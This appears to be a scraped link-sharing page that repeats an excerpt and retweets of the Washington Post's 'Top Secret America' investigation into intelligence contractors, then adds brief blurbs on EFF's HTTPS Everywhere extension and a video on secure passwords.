To ensure that the country's most sensitive duties are carried out only by people loyal above all to the nation's interest, federal rules say contractors may not perform what are called "inherently government functions." But they do, all the time and in every intelligence and counterterrorism agency, according to a two-year investigation by The Washington Post. What started as a temporary fix in response to the terrorist attacks has turned into a dependency that calls into question whether the federal workforce includes too many people obligated to shareholders rather than the public interest -- and whether the government is still in control of its most sensitive activities.

To ensure that the country's most sensitive duties are carried out only by people loyal above all to the nation's interest, federal rules say contractors may not perform what are called "inherently government functions." But they do, all the time and in every intelligence and counterterrorism agency, according to a two-year investigation by The Washington Post.

RT @redlog: RT @ananny Phenomenally good reporting from the Washington Post: "Top Secret America", http://bit.ly/9Ja5Fi

invetigaciones especiales acerca del gob de EUA

tl;dr Government is too big.

To ensure that the country's most sensitive duties are carried out only by people loyal above all to the nation's interest, federal rules say contractors may not perform what are called "inherently government functions." But they do, all the time and in every intelligence and counterterrorism agency, according to a two-year investigation by The Washington Post. What started as a temporary fix in response to the terrorist attacks has turned into a dependency that calls into question whether the federal workforce includes too many people obligated to shareholders rather than the public interest -- and whether the government is still in control of its most sensitive activities.

To ensure that the country's most sensitive duties are carried out only by people loyal above all to the nation's interest, federal rules say contractors may not perform what are called "inherently government functions." But they do, all the time and in every intelligence and counterterrorism agency, according to a two-year investigation by The Washington Post.

RT @redlog: RT @ananny Phenomenally good reporting from the Washington Post: "Top Secret America", http://bit.ly/9Ja5Fi

invetigaciones especiales acerca del gob de EUA

tl;dr Government is too big.

To ensure that the country's most sensitive duties are carried out only by people loyal above all to the nation's interest, federal rules say contractors may not perform what are called "inherently government functions." But they do, all the time and in every intelligence and counterterrorism agency, according to a two-year investigation by The Washington Post. What started as a temporary fix in response to the terrorist attacks has turned into a dependency that calls into question whether the federal workforce includes too many people obligated to shareholders rather than the public interest -- and whether the government is still in control of its most sensitive activities.

To ensure that the country's most sensitive duties are carried out only by people loyal above all to the nation's interest, federal rules say contractors may not perform what are called "inherently government functions." But they do, all the time and in every intelligence and counterterrorism agency, according to a two-year investigation by The Washington Post.

RT @redlog: RT @ananny Phenomenally good reporting from the Washington Post: "Top Secret America", http://bit.ly/9Ja5Fi

Technical Analysis by Peter Eckersley Today EFF and the Tor Project are launching a public beta of a new Firefox extension called HTTPS Everywhere.

Encrypt the Web with the HTTPS Everywhere Firefox Extension | Electronic Frontier Foundation http://bit.ly/9PRtyX

This Firefox extension was inspired by the launch of Google's encrypted search option. We wanted a way to ensure that every search our browsers sent was encrypted. At the same time, we were also able to encrypt most or all of the browser's communications with some other sites: * Google Search * Wikipedia * Twitter and Identi.ca * Facebook * EFF and Tor * Ixquick, DuckDuckGo, Scroogle and other small search engines * and lots more!

Explaining the necessity of having a secure password.

Explained by Common Craft